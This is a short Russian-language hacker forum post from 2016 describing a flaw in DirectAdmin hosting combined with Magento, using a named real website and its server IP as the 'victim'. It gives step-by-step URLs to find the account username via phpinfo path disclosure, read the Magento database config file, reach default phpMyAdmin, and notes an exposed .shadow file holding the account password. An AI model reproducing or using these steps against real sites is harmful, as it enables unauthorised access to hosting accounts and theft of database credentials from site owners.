Тема
:
Касяки DirectAdmin'a
Показать сообщение отдельно
#
3
10.09.2016, 21:36
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
вот пример на Magento+DirectAdmin
жертва:
https://www.smitsarnhem.nl/
смотрим пхпинфо или ищем раскрытие путей
https://www.smitsarnhem.nl/phpinfo.php
_SERVER["DOCUMENT_ROOT"] /home/
smitsarn
/domains/smitsarnhem.nl/private_html
т.е
smitsarn
является нашим юзером, идем дальше...
http://194.247.31.208/~
smitsarn
/app/etc/local.xml читаем конфиг
phpmyadmin лежит по дефолту всегда:
http://194.247.31.208/phpMyAdmin/
https://www.smitsarnhem.nl/phpMyAdmin/
а дальше уже дело техник....
еще касяк, нам полностью доступна пака /home/%USERNAME%/ где /home/%USERNAME%/.shadow лежит пасс от аккаунта %USERNAME%
winstrool
Посмотреть профиль
Репутация
Отправить личное сообщение для winstrool
Найти все сообщения от winstrool
Добавить в друзья